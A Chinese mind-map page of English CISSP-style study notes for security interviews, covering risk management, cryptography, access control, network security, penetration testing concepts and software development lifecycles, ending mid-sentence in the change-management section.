导图社区 安全面试中涉及的英语
本文详细总结了安全面试中可能用到的知识,并且翻译为英语,非常具有价值,旨在为准备面试的安全专业人员以及希望深入了解该领域的人提供宝贵资源。
编辑于2024-12-07 15:33:17这是一篇关于DPIA流程和模板的思维导图,主要内容包括:DPIA模版,DPIA概述和范围,如何执行DPIA,可接受的DPIA标准,DPIA解决什么问题,DPIA执行标准。
本文翻译了GDPR并且添加了解析,深入剖析GDPR的各个方面,可以更好地理解这一法规的重要性,并为企业和个人在数据保护方面提供有益的指导和建议。非常有价值。
这是一篇关于信息安全技术 、数据安全能力成熟度模型Informatio的思维导图,主要内容包括:附 录 C (资料性附录) 能力成熟度等级评估流程和模型使用方法,附 录 B (资料性附录) 能力成熟度等级评估参考方法,DSMM架构,附 录 A(资料性附录) 能力成熟度等级描述与 GP,DSMM-数据安全过程维度,DSMM-安全能力维度。
社区模板帮助中心,点此进入>>
这是一篇关于DPIA流程和模板的思维导图,主要内容包括:DPIA模版,DPIA概述和范围,如何执行DPIA,可接受的DPIA标准,DPIA解决什么问题,DPIA执行标准。
本文翻译了GDPR并且添加了解析,深入剖析GDPR的各个方面,可以更好地理解这一法规的重要性,并为企业和个人在数据保护方面提供有益的指导和建议。非常有价值。
这是一篇关于信息安全技术 、数据安全能力成熟度模型Informatio的思维导图,主要内容包括:附 录 C (资料性附录) 能力成熟度等级评估流程和模型使用方法,附 录 B (资料性附录) 能力成熟度等级评估参考方法,DSMM架构,附 录 A(资料性附录) 能力成熟度等级描述与 GP,DSMM-数据安全过程维度,DSMM-安全能力维度。
安全面试中涉及的英语
Risk management
Risk management employs a vast terminology that must be clearly understood, espe- cially for the CISSP exam.
Asset An asset is anything used in a business process or task. Asset Valuation Asset valuation is value assigned to an asset based on a number of factors, including importance to the organization, use in critical process, actual cost, and nonmonetary expenses/costs (such as time, attention, productivity, and research and development). An asset-based or asset-initiated risk analysis starts with inventorying all organizational assets. Once that inventory is complete, a valuation needs to be assigned to each asset. Threats Any potential occurrence that may cause an undesirable or unwanted outcome for an organization or for a specific asset is a threat. Threats are any action or inaction that could cause damage, destruction, alteration, loss, or disclosure of assets or that could block access to or prevent maintenance of assets. They can be intentional or accidental. They can originate from inside or outside. You can loosely think of a threat as a weapon that could cause harm to a target. Threat Agent/Actors Threat agents or threat actors intentionally exploit vulnerabilities. Threat agents are usually people, but they could also be programs, hardware, or systems. Threat agents wield threats in order to cause harm to targets. Threat Events Threat events are accidental occurrences and intentional exploitations of vulnerabilities. They can also be natural or person-made. Threat events include fire, earthquake, flood, system failure, human error (due to a lack of training or ignorance), and power outage. Threat Vector A threat vector or attack vector is the path or means by which an attack or attacker can gain access to a target in order to cause harm. Threat vectors can include email, web surfing, external drives, Wi-Fi networks, physical access, mobile devices, cloud, social media, supply chain, removable media, and commercial software. Vulnerability The weakness in an asset or the absence or the weakness of a safeguard or countermeasure is a vulnerability. In other words, a vulnerability is a flaw, loophole, oversight, error, limitation, frailty, or susceptibility that enables a threat to cause harm. Exposure Exposure is being susceptible to asset loss because of a threat; there is the possibility that a vulnerability can or will be exploited by a threat agent or event. Exposure doesn’t mean that a realized threat (an event that results in loss) is actually occurring, just that there is the potential for harm to occur. The quantitative risk anal- ysis value of exposure factor (EF) is derived from this concept. Risk Risk is the possibility or likelihood that a threat will exploit a vulnerability to cause harm to an asset and the severity of damage that could result. The more likely it is that a threat event will occur, the greater the risk. The greater the amount of harm that could result if a threat is realized, the greater the risk. Every instance of exposure is a risk. When written as a conceptual formula, risk can be defined as follows: risk = threat * vulnerability or risk = probability of harm * severity of harm Thus, addressing either the threat or threat agent or the vulnerability directly results in a reduction in risk. This activity is known as risk reduction or risk mitigation, which is the overall goal of risk management. When a risk is realized, a threat agent, a threat actor, or a threat event has taken advantage of a vulnerability and caused harm to or disclosure of one or more assets. The whole purpose of security is to prevent risks from becoming realized by removing vulnerabil- ities and blocking threat agents and threat events from jeopardizing assets. Safeguards A safeguard, security control, protection mechanism, or countermeasure is anything that removes or reduces a vulnerability or protects against one or more specific threats. This concept is also known as a risk response. A safeguard is any action or product that reduces risk through the elimination or lessening of a threat or a vulnera- bility. Safeguards are the means by which risk is mitigated or resolved. It is important to remember that a safeguard need not involve the purchase of a new product; reconfigur- ing existing elements and even removing elements from the infrastructure are also valid safeguards or risk responses. Attack An attack is the intentional attempted exploitation of a vulnerability by a threat agent to cause damage, loss, or disclosure of assets. An attack can also be viewed as any violation or failure to adhere to an organization’s security policy. A malicious event does not need to succeed in violating security to be considered an attack. Breach A breach, intrusion, or penetration is the occurrence of a security mechanism being bypassed or thwarted by a threat agent. A breach is a successful attack. Risk management attempts to reduce or eliminate vulnerabilities or reduce the impact of potential threats by implementing controls or countermeasures.
Quantitative risk analysis
The major steps or phases in quantitative risk analysis are as follows: 1. Inventory assets, and assign a value (asset value [AV]). 2. Research each asset, and produce a list of all possible threats to each individual asset.This results in asset-threat pairings. 3. For each asset-threat pairing, calculate the exposure factor (EF). 4. Calculate the single loss expectancy (SLE) for each asset-threat pairing. 5. Perform a threat analysis to calculate the likelihood of each threat being realized within a single year—that is, the annualized rate of occurrence (ARO). 6. Derive the overall loss potential per threat by calculating the annualized loss expectancy (ALE). 7. Research countermeasures for each threat, and then calculate the changes to ARO, EF, and ALE based on an applied countermeasure. 8. Perform a cost/benefit analysis of each countermeasure for each threat for each asset. Select the most appropriate response to each threat. Identifying risks Evaluating the severity of and prioritizing those risks Prescribing responses to reduce or eliminate the risks Tracking the progress of risk mitigation
Risk Responses
Risk Mitigation Reducing risk, or risk mitigation, is the implementation of safeguards, security controls, and countermeasures to reduce and/or eliminate vulnerabilities or block threats. Deploying encryption and using firewalls are common examples of risk mitigation or reduction. Elimination of an individual risk can sometimes be achieved, but typically some risk remains even after mitigation or reduction efforts. Risk Assignment Assigning risk or transferring risk is the placement of the responsi- bility of loss due to a risk onto another entity or organization. Purchasing cybersecurity or traditional insurance and outsourcing are common forms of assigning or transferring risk. Also known as assignment of risk and transference of risk. Risk Deterrence Risk deterrence is the process of implementing deterrents to would-be violators of security and policy. The goal is to convince a threat agent not to attack. Some examples include implementing auditing, security cameras, and warning banners; using security guards; and making it known that the organization is willing to cooperate with authorities and prosecute those who participate in cybercrime. Risk Avoidance Risk avoidance is the process of selecting alternate options or activities that have less associated risk than the default, common, expedient, or cheap option. For example, choosing to fly to a destination instead of driving to it is a form of risk avoid- ance. Another example is to locate a business in Arizona instead of Florida to avoid hur- ricanes. The risk is avoided by eliminating the risk cause. A business leader terminating a business endeavor because it does not align with organizational objectives and that has a high risk versus reward ratio is also an example of risk avoidance. Risk Acceptance Accepting risk, or acceptance of risk, is the result after a cost/benefit analysis shows countermeasure costs would outweigh the possible cost of loss due to a risk. It also means that management has agreed to accept the consequences and the loss if the risk is realized. In most cases, accepting risk requires a clearly written state- ment that indicates why a safeguard was not implemented, who is responsible for the decision, and who will be responsible for the loss if the risk is realized, usually in the form of a document signed by senior management. Risk Rejection An unacceptable possible response to risk is to reject risk or ignore risk. Denying that a risk exists and hoping that it will never be realized are not valid or prudent due care/due diligence responses to risk. Rejecting or ignoring risk may be con- sidered negligence in court.
Security Control TYPE
Preventive Examples of preventive controls include fences, locks, authentication, access control vestibules, alarm systems, separation of duties, job rotation, data loss prevention (DLP), penetration testing, access control methods, encryption, auditing, security policies, security-awareness training, antimalware software, firewalls, and intrusion prevention systems (IPSs). Detective A detective control is deployed to discover or detect unwanted or unauthorized activity. Detective controls operate after the fact and can discover the activity only after it has occurred. Examples of detective controls include security guards, motion detectors, recording and reviewing of events captured by security cameras or CCTV, job rotation, mandatory vacations, audit trails, honeypots or honeynets, intrusion detection systems (IDSs), violation reports, supervision and review of users, and incident investigations. Compensating They can be a means to improve the effectiveness of a primary control or as the alternate or failover option in the event of a primary control failure. For example, if a preventive control fails to stop the deletion of a file, a backup can be a compensation control, allowing for restoration of that file. Here’s another example: if a building’s fire prevention and suppression systems fail and the building is damaged by fire so that it is not inhabitable, a compensation control would be having a disaster recovery plan (DRP) with an alternate processing site available to support work operations. Corrective A corrective control modifies the environment to return systems to normal after an unwanted or unauthorized activity has occurred. Examples include installing a spring on a door so that it will close and relock, and using file integrity–checking tools, such as sigverif from Windows, which will replace corrupted boot files upon each boot event to protect the stability and security of the booted OS. Recovery A recovery control attempts to repair or restore resources, functions, and capabilities after a security policy violation. Recovery controls typically address more significant damaging events compared to corrective controls, especially when security violations may have occurred. Examples of recovery controls include backups and restores, fault-tolerant drive systems, system imaging, server clustering, antimalware software, and database or virtual machine shadowing. In relation to business continuity and disaster recovery, recovery controls can include hot, warm, and cold sites; alternate processing facilities; service bureaus; reciprocal agreements; cloud providers; rolling mobile operating centers; and multisite solutions. Directive A directive control is deployed to direct, confine, or control the actions of subjects to force or encourage compliance with security policies. Examples of directive controls include security policy requirements or criteria, posted notifications, guidance from a security guard, escape route exit signs, monitoring, supervision, and procedures.
Identifying and Classifying Information and Assets
Defining Sensitive Data Sensitive data is any information that isn’t public or unclassified. It can include confidential, proprietary, protected, or any other type of data that an organization needs to protect due to its value to the organization, or to comply with existing laws and regulations. Defining Data Classifications Organizations typically include data classifications in their security policy or a data policy. A data classification identifies the value of the data to the organization and is critical to protect data confidentiality and integrity. Defining Asset Classifications Asset classifications should match the data classifications. In other words, if a computer is processing top secret data, the computer should also be classified as a top secret asset. Similarly, if media such as internal or external drives hold top secret data, the media should also be classified as top secret. Determining Data Security Controls After defining data and asset classifications, you must define the security requirements and identify security controls to implement those requirements.When users know the value of the data, they are more likely to take appropriate steps to control and protect it based on the classification.
Understanding Data States
Data at Rest Data at rest (sometimes called data on storage) is any data storedon media such as system hard drives, solid-state drives (SSDs), external USB drives, storage area networks (SANs), and backup tapes. Strong symmetric encryption protects data at rest. Data in Transit Data in transit (sometimes called data in motion or being commu- nicated) is any data transmitted over a network. Data in Use Data in use (also known as data being processed) refers to data in memory or temporary storage buffers while an application is using it.
Data Loss Prevention
Data loss prevention (DLP) systems attempt to detect and block data exfiltration attempts. These systems have the capability of scanning unencrypted data looking for keywords and data patterns. There are two primary types of DLP systems: Network-Based DLP A network-based DLP scans all outgoing data looking for specific data. Administrators place it on the edge of the network to scan all data leaving the organization. If a user sends out a file containing restricted data, the DLP system will detect it and prevent it from leaving the organization. The DLP system will send an alert, such as an email to an administrator. Cloud-based DLP is a subset of network-based DLP. Endpoint-Based DLP An endpoint-based DLP can scan files stored on a system as well as files sent to external devices, such as printers. For example, an organization’s endpoint-based DLP can prevent users from copying sensitive data to USB flash drives or sending sensitive data to a printer. Administrators configure the DLP to scan the files with the appropriate keywords, and if it detects files with these keywords, it will block the copy or print job. It’s also possible to configure an endpoint-based DLP system to regularly scan files (such as on a file server) for files containing specific keywords or patterns, or even for unauthorized file types, such as MP3 files.
Common Data Destruction Methods
Erasing Erasing media is simply performing a delete operation against a file, a selection of files, or the entire media. Clearing Clearing, or overwriting, is a process of preparing media for reuse and ensuring that the cleared data cannot be recovered using traditional recovery tools. Purging Purging is a more intense form of clearing that prepares media for reuse in less secure environments. Degaussing A degausser creates a strong magnetic field that erases data on some media in a process called degaussing. Destruction Destruction is the final stage in the lifecycle of media and is the most secure method of sanitizing media.
Ensuring Appropriate Data and Asset Retention
Record retention involves retaining and maintaining important information as long as it is needed and destroying it when it is no longer needed.An organization’s security policy or data policy typically identifies retention time frames. Some laws and regulations dictate the length of time that an organization should retain data. Organizations have the responsibility of identifying laws and regulations that apply and complying with them.
Data Protection Methods
DLP Encryption CASB Cloud Access Security Broker. It monitors all activity and enforces administrator-defined security policies.A CASB would typically include authentication and authorization controls and ensure only authorized users can access the cloud resources. The CASB can also log all access, monitor activity, and send alerts on suspicious activity. Pseudonymization Pseudonymization refers to the process of using pseudonyms ([ˈsuːdənɪm])to represent other data. Tokenization Tokenization is the use of a token to replace other data. It is often used with credit card transactions. Anonymization Anonymization is the process of removing all relevant data so that it is theoretically impossible to identify the original subject or person.
Understanding Data Roles
子主题
Cryptography and Symmetric Key Algorithms (/krɪpˈtɑːɡrəfi/)
Confidentiality is perhaps the most widely cited goal of cryptosystems. Two main types of cryptosystems enforce confidentiality: Symmetric(/sɪ'metrɪk/) cryptosystems use a shared secret key available to all users of the cryptosystem. Symmetric key cryptography has several weaknesses: Key distribution is a major problem. Parties must have a secure method of exchanging the secret key before establishing communications. Symmetric key cryptography does not implement nonrepudiation. Keys must be regenerated often. Each time a participant leaves the group, all keys known by that participant must be discarded. Asymmetric (/ˌeɪsɪˈmetrɪk/)cryptosystems use individual combinations of public and private keys for each user of the system. The following is a list of the major strengths of asymmetric key cryptography: The addition of new users requires the generation of only one public-private key pair. Users can be removed far more easily from asymmetric systems. Key regeneration is required only when a user’s private key is compromised. Asymmetric key encryption can provide integrity, authentication, and nonrepudiation. Key distribution is a simple process. The major weakness of public key cryptography is its slow speed of operation. Applications that require the secure transmission of large amounts of data use public key cryptography to establish a connection and then exchange a symmetric secret key. The remainder of the session then uses symmetric cryptography. This approach of combining symmetric and asymmetric cryptography is known as hybrid cryptography.Hybrid cryptography combines symmetric and asymmetric cryptography to achieve the key distribution benefits of asymmetric cryptosystems with the speed of symmetric algo- rithms. Message integrity is enforced through the use of encrypted message digests, known as digital signatures, created upon transmission of a message. Authentication verifies the claimed identity of system users and is a major function of cryptosystems. Nonrepudiation provides assurance to the recipient that the message was originated by the sender and not someone masquerading ([ˌmæskəˈreɪdɪŋ]) as the sender. It also prevents the sender from claiming that they never sent the message in the first place. Zero-Knowledge Proof is to prove your knowledge of a fact to a third party without revealing the fact itself to that third party. Split Knowledge When the information is divided among multiple users, no single person has sufficient privileges to compromise the security of an environment(kown all). This separation of duties and two-person control contained in a single solution is called split knowledge. Confusion and Diffusion Confusion occurs when the relationship between the plaintext and the key is so complicated that an attacker can’t merely continue altering the plaintext and analyzing the resulting ciphertext to determine the key. Diffusion occurs when a change in the plaintext results in multiple changes spread throughout the ciphertext.
Hashing Algorithms
Message digests (also known as hash values or fingerprints) are summaries of a message’s content produced by a hashing algorithm. it’s very unlikely that two messages will produce the same hash value. Cases where a hash function produces the same value for two different methods are known as collisions
the recipient can use the same hash function to recompute the message digest from the full message. They can then compare the computed message digest to the transmitted one to ensure that the message sent by the originator is the same one received by the recipient. ■ ■ ■ The input can be of any length. The output has a fixed length. The hash function is relatively easy to compute for any input. The hash function is one-way/cannot be reversed The hash function is collision resistant. The hashed message authentication code (HMAC) algorithm implements a partial digital signature—it guarantees the integrity of a message during transmission, but it does not provide for nonrepudiation.HMAC can be combined with any standard message digest generation algorithm, such as MD5, SHA-2, or SHA-3, by using a shared secret key.Because HMAC relies on a shared secret key, it does not provide any nonrepudiation functionality.
Digital Signatures Using public key cryptography and hashing functions.Digital signature infrastructures have two distinct goals: Digitally signed messages assure the recipient that the message truly came from the claimed sender. They enforce nonrepudiation Digitally signed messages assure the recipient that the message was not altered while in transit between the sender and recipient. DSA、RSA(Rivest–Shamir–Adleman)、ECDSA(Elliptic Curve DSA) If you want to encrypt a confidential message, use the recipient’s public key. If you want to decrypt a confidential message sent to you, use your private key. If you want to digitally sign a message you are sending to someone else, use your private key. If you want to verify the signature on a message sent by someone else, use the sender’s public key.
Public Key Infrastructure
The composition of a digital certificate: Certificate authority (CA) ensures that the public key is legitimate. Registration authorities (RAs) assist CAs with verifying users’ identities prior to issuing digital certificates. The public keys and private keys a certificate revocation ([ˌrevəˈkeɪʃn]) list (CRL) or the Online Certificate Status Protocol (OCSP) Certificate Lifecycle Enrollment When you want to obtain a digital certificate, you must first prove your identity to the CA in some manner; this process is called enrollment.the public key and the signature the CA. Verification verify the certificate by checking the CA’s digital signature using the CA’s public key. Revocation a certificate authority revokes a certificate.
Asymmetric Key Management
First, choose your encryption system wisely. You must also select your keys in an appropriate manner.length and truly random,keep your private key secret. Retire keys when they’ve served a useful life. Back up your key!
Cryptographic Attacks
Analytic Attack Analytic attacks focus on the logic of the algorithm itself.to find the weakness of the algrorithm. Implementation Attack This is a type of attack that exploits weaknesses in the implementation of a cryptography system. It focuses on exploiting the software code, not just errors and flaws but the methodology employed to program the encryption system. Statistical Attack Statistical attacks attempt to find a vulnerability in the hardware or operating system hosting the cryptography application. Brute-Force Attack Brute-force attacks are quite straightforward. Such an attack attempts every possible valid combination for a key or password. Fault Injection Attack They might use high-voltage electricity, high or low temperature, or other factors to cause a malfunction that undermines the security of the device. Side-Channel Attack Side-channel attacks seek to use information to monitor system activity as radiation and retrieve information that is actively being encrypted. Timing Attack Timing attacks are an example of a side-channel attack where the attacker measures precisely how long cryptographic operations take to complete, gaining information about the cryptographic process that may be used to undermine its security.
There are two modifications that attackers can make to enhance the effectiveness of a brute-force attack: Rainbow tables provide precomputed values for cryptographic hashes. These are commonly used for cracking passwords stored on a system in hashed form. Specialized, scalable computing hardware designed specifically for the conduct of brute-force attacks may greatly increase the efficiency of this approach. To help combat the use of brute-force attacks, including those aided by dictionaries and rainbow tables, cryptographers make use of a technology known as cryptographic salt.
Known Plaintext In the known plaintext attack, the attacker has a copy of the encrypted message along with the plaintext message used to generate the ciphertext (the copy). Ciphertext-Only Attack In many cases, the only information you have at your disposal is the encrypted ciphertext message, a scenario known as the ciphertext-only attack. Chosen Plaintext In this attack, the attacker obtains the ciphertexts corresponding to a set of plaintexts of their own choosing. This allows the attacker to attempt to derive the key used and thus decrypt other messages encrypted with that key. Chosen Ciphertext In a chosen ciphertext attack, the attacker has the ability to decrypt chosen portions of the ciphertext message and use the decrypted portion of the message to discover the key.
Secure Design Principles
Security should be a consideration at every stage of a system’s development. Programmers, developers, engineers, and so on should build security into every application or system they develop, with greater levels of security provided to critical applications and systems that process sensitive information. Security is to be an element of design and architecture of a product starting at initiation and being maintained throughout the software development lifecycle (SDLC).
Secure Defaults
Never assume that the default settings of any product are secure. Programmers, developers, engineers, and so on should build security into every application or system they develop, with greater levels of security provided to critical applications and systems that process sensitive information. Security is to be an element of design and architecture of a product starting at initiation and being maintained throughout the software development lifecycle (SDLC).
Fail Securely Keep it simple
In the realm of security, this concept is the encouragement to avoid overcomplicating the environment, organization, or product design. The more complex a system, the more difficult it is to secure.
Zero Trust
Zero trust is an approach to security where nothing is automatically trusted. Instead, each request for access is assumed to be from an unknown and untrusted location until verified.The goal is to have every access request be authenticated, autho- rized, and encrypted prior to the access being granted to a resource or asset. Zero trust is implemented using a wide range of security solutions, including internal segmentation firewalls (ISFWs), multifactor authentication (MFA), identity and access management (IAM), and next-generation endpoint security.
Privacy by Design
Privacy by Design (PbD) is a guideline to integrate privacy protections into products during the early design phase rather than attempting to tack it on at the end of development. Privacy security is to be an element of design and architecture of a product starting at initiation and being maintained throughout the software development lifecycle (SDLC). ■ ■ ■ ■ ■ ■ ■ Proactive not reactive; preventive not remedial Privacy as the default Privacy into design Full functionality – positive-sum, not zero-sum End-to-end security – full lifecycle protection Visibility and transparency Respect for user privacy
Techniques for Ensuring CIA
Confinement Process confinement allows a process to read from and write to only certain memory locations and resources. This is also known as sandboxing. It is the application of the principle of least privilege to processes. The goal of confinement is to prevent data leakage to unauthorized programs, users, or systems. Bounds Each process that runs on a system is assigned an authority level. The authority level tells the operating system what the process can do. In simple systems, there may be only two authority levels: user and kernel. The authority level tells the operating system how to set the bounds for a process. Isolation When a process is confined through enforcing access bounds, that process runs in isolation. Process isolation ensures that any behavior will affect only the memory and resources associated with the isolated process. Access Controls To ensure the security of a system, you need to allow subjects to access only authorized objects. Access controls limit the access of a subject to an object. Trust and Assurance A trusted system is one in which all protection mechanisms work together to process sensitive data for many types of users while maintaining a stable and secure computing environment.
Understand the Fundamental Concepts of Security Models
■ ■ ■ ■ ■ ■ ■ ■ ■ ■ ■ ■ ■ ■ Trusted computing base State machine model Information flow model Noninterference model Take-grant model Access control matrix Bell–LaPadula model Biba model Clark–Wilson model Brewer and Nash model Goguen–Meseguer model Sutherland model Graham–Denning model Harrison–Ruzzo–Ullman model
Physical Security Requirements
Secure Facility Plan A secure facility plan defines the security needs of your organization and emphasizes methods or mechanisms to employ to provide security. Such a plan is developed through risk assessment and critical path analysis. Critical path analysis is a systematic effort to identify relationships between mission-critical applications, processes, and operations and all the necessary supporting elements.A secure facility plan is based on a layered defense model. Only with overlapping layers of physical security can a reasonable defense be established against would-be intruders.` The top priority of security should always be the protection of the life and safety of personnel. Intrusion Detection Systems Motion Detectors Intrusion Alarms Secondary Verification Mechanisms CCTV Fire Detection Systems Water Suppression Systems Perimeter Security Controls:mantrap,Security Guards
Secure Network Architecture and Components
OSI Functionality The OSI model divides networking tasks into seven layers. Each layer is responsible for performing specific tasks or operations with supporting data exchange between two computers. Communication between protocol layers occurs through encapsulation and deencapsulation. Encapsulation is the addition of a header, and possibly a footer, to the data received by each layer from the layer above before it’s handed off to the layer below.The inverse action is deencapsulation. Application Layer The Application layer (layer 7) is responsible for interfacing user applications Presentation Layer The Presentation layer (layer 6) is responsible for transforming data into a format that any system following the OSI model can understand. Session Layer The Session layer (layer 5) is responsible for establishing, maintaining, and terminating communication sessions between two computers. Transport Layer The Transport layer (layer 4) is responsible for managing the integrity of a connection and controlling the session. Network Layer The Network layer (layer 3) is responsible for logical addressing and performing routing. Data Link Layer The Data Link layer (layer 2) is responsible for formatting the packet for transmission. Physical Layer The Physical layer (layer 1) converts a frame into bits for transmission over the physical connection medium. Domain Name System Domain Name System (DNS) resolves a human-friendly domain name into its IP address equivalent. Rogue DNS Server A rogue DNS server can listen in on network traffic for any DNS query or specific DNS queries related to a target site. Then the rogue DNS server sends a DNS response to the client with false IP information. Performing DNS Cache Poisoning DNS poisoning involves attacking DNS servers and placing incorrect information into its zone file or cache. DNS Pharming Another attack closely related to DNS poisoning and/or DNS spoofing is DNS pharming. Pharming is the malicious redirection of a valid website’s URL or IP address to a fake web- site.Pharming typically occurs either by modifying the local hosts file on a system or by poisoning or spoofing DNS resolution. IPv4 vs. IPv6 IPv4 is the version of Internet Protocol that is most widely used around the world. However, IPv6 is being rapidly adopted for both private and public network use. IPv4 uses a 32-bit addressing scheme, whereas IPv6 uses 128 bits for addressing. ARP Concerns Address Resolution Protocol (ARP) is used to resolve IP addresses (32-bit binary number for logical addressing) into MAC addresses (48-bit binary number for physical address- ing).
Managing Identity and Authentication
Controlling Access to Assets Information An organization’s information includes all of its data. Systems An organization’s systems include any IT systems that provide one or more services. Devices Devices refer to any computing system, including routers, switches, servers, desktop computers, portable laptop computers, tablets, smartphones, and external devices such as printers. Facilities An organization’s facilities include any physical location that it owns or rents. This could be individual rooms, entire buildings, or whole complexes of several buildings. Physical security controls help protect facilities. Applications Applications frequently provide access to an organization’s data. Physical security controls protect systems, devices, and facilities by controlling access and controlling the environment. As an example, organizations often have a server room where servers, routers and switches are running. cipher locks controlling entry into the server room is proper ~~~ Logical access controls are the technical controls used to protect access to information, systems, devices, and applications. They include authentication, authorization, and permissions.They help prevent unauthorized access to data and configuration settings on systems and other devices. Managing Identification and Authentication Identification is the process of a subject claiming an identity. Authentication verifies the subject’s identity by comparing one or more factors against a database of valid identities, such as user accounts. Identification and authentication occur together as a single two-step process. Providing an identity is the first step, and providing the authentication information is the second step. Without both, a subject cannot gain access to a system. Authorization and Accountability Authorization Subjects are granted access to objects based on proven identities. Authorization indicates who is trusted to perform specific operations. Accountability Auditing tracks subjects and records when they access objects, creating an audit trail in one or more audit logs. For example, auditing can record when a user reads, modifies, or deletes a file. Auditing provides accountability. Password Policy Components Maximum Age,Password Complexity,Password Length,Password History Multifactor Authentication (MFA) Multifactor authentication (MFA) is any authentication using two or more factors.As an example, smartcards require users to insert their card into a reader and enter a PIN. Mutual Authentication When a client accesses a server, both the client and the server provide authentication. This prevents a client from revealing information to a rogue server. Mutual authentication methods commonly use digital certificates. Single Sign-On Single sign-on (SSO) is a centralized access control technique that allows a subject to be authenticated once on a system and access multiple resources without authenticating again. Many cloud-based applications use SSO solutions, making it easier for users to access resources over the internet. Cloud-based applications use federated identity management (FIM) systems, which are a form of SSO. Just-in-Time Some federated identity solutions support just-in-time (JIT) provisioning. These solutions automatically create the relationship between two entities so that new users can access resources.
Controlling and Monitoring Access
Introducing Access Control Models Discretionary Access Control A key characteristic of the Discretionary Access Control (DAC) model is that every object has an owner and the owner can grant or deny access to any other subjects. Role-Based Access Control A key characteristic of the Role-Based Access Control (RBAC) model is the use of roles or groups. Instead of assigning permissions directly to users, user accounts are placed in roles and administrators assign privileges to the roles. Rule-Based Access Control A key characteristic of the rule-based access control model is that it applies global rules to all subjects. As an example, a firewall A rule-based access control model uses a set of rules, restrictions, or filters to determine what can and cannot occur on a system. Attribute-Based Access Control A key characteristic of the Attribute-Based Access Control (ABAC) model is its use of rules that can include multiple attributes. Mandatory Access Control A key characteristic of the Mandatory Access Control (MAC) model is the use of labels applied to both subjects and objects. Privilege Escalation Privilege escalation refers to any situation that gives users more privileges than they should have. Password Attacks Dictionary Attack A dictionary attack is an attempt to discover passwords by using every possible password in a predefined database or list of common or expected passwords. Brute-Force Attack A brute-force attack is an attempt to discover passwords by attempting all possible combinations of letters, numbers, and symbols. Spraying Attack A spraying attack is a special type of brute-force attack. Attackers use spraying attacks in online password attacks, attempting to bypass account lockout security controls. Birthday Attack A birthday attack focuses on finding collisions. Rainbow Table Attack A rainbow table reduces this time by using large databases of precomputed hashes. Mimikatz Here are some capabilities of Mimikatz:Read Passwords from Memory,Extract Kerberos Tickets,Extract Certificates and Private Keys,Read Cleartext Passwords in Local Security Authority Subsystem Service (LSASS) Core Protection Methods Control physical access to systems. Control electronic access to files. Hash and salt passwords. Use password masking. Deploy multifactor authentication. Use account lockout controls. Use last logon notification. Educate users about security.
Security Assessment and Testing
Security Testing Security tests verify that a control is functioning properly. These tests include automated scans, tool-assisted penetration tests, and manual attempts to undermine security. Security Assessments Security assessments are comprehensive reviews of the security of a system, application,or other tested environment. The main work product of a security assessment is normally an assessment report that contains the results of the assessment in nontechnical language and concludes with specific recommendations for improving the security of the tested environment. Security Audits Security audits use many of the same techniques followed during security assessments but must be performed by independent auditors.Security audits performed with the purpose of demonstrating the effectiveness of controls to a third party.They write reports that are intended for an organization’s board of directors, government regulators, and other third parties. Performing Vulnerability Assessments We need standards to provide a common language for describing and evaluating vulnerabilities. NIST provides us with the Security Content Automation Protocol (SCAP) to meet this need.SCAP provides this common framework for discussion and also facilitates the automation of interactions bet- ween different security systems. CVE provides a naming system for describing security vulnerabilities. CVSS provides a standardized system for describing the severity of security vulnerabilities. CCE provides a naming system for system configuration issues. CPE provides a naming system for operating systems, applications, and devices. XCCDF provides a language for specifying security checklists. OVAL provides a language for describing security testing procedures. Vulnerability Scans There are four main categories of vulnerability scans: Network discovery scanning uses a variety of techniques to scan a range of IP addresses, searching for systems with open network ports. TCP SYN Scanning,TCP Connect Scanning,TCP ACK Scanning,UDP Scanning Network vulnerability scans go deeper than discovery scans. They don’t stop with detecting open ports but continue on to probe a targeted system or network for the presence of known vulnerabilities. Web vulnerability scanners are special-purpose tools that scour web applications for known vulnerabilities. Database vulnerability scanners are tools that allow security professionals to scan both databases and web applications for vulnerabilities that may affect database security. Penetration Testing The penetration test goes beyond vulnerability testing techniques because it actually attempts to exploit systems. Vulnerability scans merely probe for the presence of a vulnerability and do not normally take offensive action against the targeted system. penetration testing process as consisting of the four phases: Planning includes agreement on the scope of the test and the rules of engagement. This is an extremely important phase because it ensures that both the testing team and management are in agreement about the nature of the test and that the test is explicitly authorized. Information gathering and discovery uses manual and automated tools to collect information about the target environment. Testers also use automated tools during this phase to probe for system weaknesses using network vulnerability scans, web vulnerability scans, and database vulnerability scans. Attack seeks to use manual and automated exploit tools to attempt to defeat system security. This step is where penetration testing goes beyond vulnerability scanning, as vulnerability scans do not attempt to actually exploit detected vulnerabilities. Reporting summarizes the results of the penetration testing and makes recommendations for improvements to system security. White-Box Penetration Test Provides the attackers with detailed information about the systems they target. Gray-Box Penetration Test Also known as partial knowledge tests, these are sometimes chosen to balance the advantages and disadvantages of white- and black-box penetration tests. Black-Box Penetration Test Does not provide attackers with any information prior to the attack.
Testing Your Software
Code Review and Testing Code reviews may result in approval of an application’s move into a production environment, or they may send the code back to the original developer with recommenda- tions for rework of issues detected during the review. Static Testing Static application security testing (SAST) evaluates the security of software without running it by analyzing the source code. In mature development environments, application developers are given static analysis tools and use them throughout the design, build, and test process. Fuzz Testing Fuzz testing software supplies invalid input to the software, either randomly generated or specially crafted to trigger known software vulnerabilities. The fuzz tester then monitors the performance of the application, watching for software crashes, buffer overflows, or other undesirable and/or unpredictable outcomes. Misuse Case Testing In some applications, there are clear examples of ways that software users might attempt to misuse the application. For example, users of banking software might try to manipulate input strings to gain access to another user’s account. Test Coverage Analysis test coverage = number of use cases tested/total number of use cases(number of use cases tested is divided by total number of use cases) It is to estimate the degree of testing conducted against the new software.
Systems Development Lifecycle
these core activities are essential to the development of secure systems Conceptual definition creating the basic concept statement for a system. Functional requirements determination Control specifications development Design review you should analyze the system from a number of security perspectives. Coding Code review walk-through System test review Maintenance and change management Lifecycle Models Choosing an SDLC model is normally the work of software development teams and their leadership. Cybersecurity professionals should ensure that security principles are inter into the implementation of software development. Waterfall Model the waterfall model is the development lifecycle which includes a series of sequential (/sɪˈkwenʃl) activities.The traditional waterfall model has seven stages of development. As each stage is completed, the project moves into the next phase. System Requirements Software Requirements Preliminary Design Detailed Design Code and Debug Testing one of the major criticisms of this model is that it allows the developers to step back only one phase in the process. It does not make provisions for the discovery of errors at a later phase in the development cycle and it would take a big cost. Agile Software Development Among in many~~~,the Scrum approach is the most popular.The Scrum methodology organizes work into short sprints of activity. These are well defined periods of time, typically between one and four weeks, where the team focuses on achieving short-term objectives. The change management process has three basic components: Request Control The request control process provides an organized framework within which users can request modifications, managers can conduct cost/benefit analysis, and developers can prioritize tasks. Change Control The change control process is used by developers to recreate the situation encountered by the user and to 